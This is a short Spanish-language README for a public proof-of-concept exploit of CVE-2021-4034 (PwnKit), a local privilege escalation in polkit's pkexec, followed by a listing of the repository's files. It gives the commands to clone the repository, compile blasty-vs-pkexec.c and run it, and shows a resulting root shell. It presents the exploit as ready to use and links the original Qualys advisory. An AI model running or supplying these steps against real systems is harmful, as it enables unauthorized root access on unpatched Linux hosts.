# CVE-2021-4034
Un día para el exploit de escalada de privilegios de polkit
Simplemente ejecute y disfrute `./blasty` de tu shell raíz.
El aviso original de los autores reales es -> [aquí](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
## Instalación
Si el exploit funciona, obtendrá un shell de root inmediatamente:
```bash
(user@tecnokarita)-[~/Descargas] $> git clone https://github.com/T3cnokarita/CVE-2021-4034.git
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> gcc -o blasty blasty-vs-pkexec.c
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> ./blasty
# whoami
root
# exit
```
[4.0K] /data/pocs/a602fdd9acd726fd0ad914b50d5e5edf50c7466f
├── [ 16K] blasty
├── [2.1K] blasty-vs-pkexec.c
└── [ 614] README.md
0 directories, 3 files